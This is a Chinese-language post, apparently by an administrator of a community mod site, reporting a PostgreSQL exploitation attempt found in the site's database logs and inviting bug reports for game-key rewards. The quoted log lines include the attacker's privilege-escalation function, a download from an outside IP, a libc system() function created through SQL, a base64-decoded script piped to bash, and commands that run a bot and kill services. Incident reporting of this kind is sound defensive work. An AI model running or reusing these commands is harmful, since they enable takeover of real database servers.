昨天晚上,在维护社区模组网站的时候,发现数据库占用内存突增,检查日志后发现境外IP传输的木马文件,一次 PostgreSQL 漏洞利用攻击尝试。
2026-05-20 14:19:32.975 UTC [11087] ERROR: syntax error at or near "CONNECT"
2026-05-20 14:19:32.975 UTC [11087] STATEMENT:
CREATE ROLE r0 LOGIN;
CREATE DATABASE rdb OWNER r0;
CREATE FUNCTION pwn() RETURNS trigger AS $$
BEGIN
IF current_setting('is_superuser') THEN
ALTER USER r0 SUPERUSER;
END IF;
END $$ LANGUAGE plpgsql;
2026-05-20 14:19:39.199 UTC [11230] FATAL:
password authentication failed for user "postgres"
DETAIL:
Connection matched file "/var/lib/postgresql/data/pg_hba.conf"
line 128: "host all all all scram-sha-256"
Connecting to 83.142.209.35 (83.142.209.35:80)
saving to 'kunt'
'kunt' saved
CREATE OR REPLACE FUNCTION system(cstring)
RETURNS int
AS '/lib/x86_64-linux-gnu/libc.so.6', 'system'
LANGUAGE 'c' STRICT;
echo ZnVuY3Rpb24g...
|base64 -d|bash
/tmp/bot
chmod +x /tmp/bot
./bot database1
kill -9
watchdog
redis
dockerd
httpd
2026-05-20 14:19:41.466 UTC [11087] ERROR:
could not access file "/lib/x86_64-linux-gnu/libc.so.6"
REFRESH MATERIALIZED VIEW CONCURRENTLY mv;
CREATE CONSTRAINT TRIGGER trig;
CREATE RULE "_RETURN";
之后 @HansJack 修改了模组网站的代码,避免数据库外网暴露。
欢迎技术工作者对模组网站存在的漏洞进行提交,私信 @HansJack 即可,对漏洞严重等级(当时的情况)进行赏金激励:
- 游戏密钥
- Steam礼物卡
也同样欢迎对社区模组网站进行协助开发: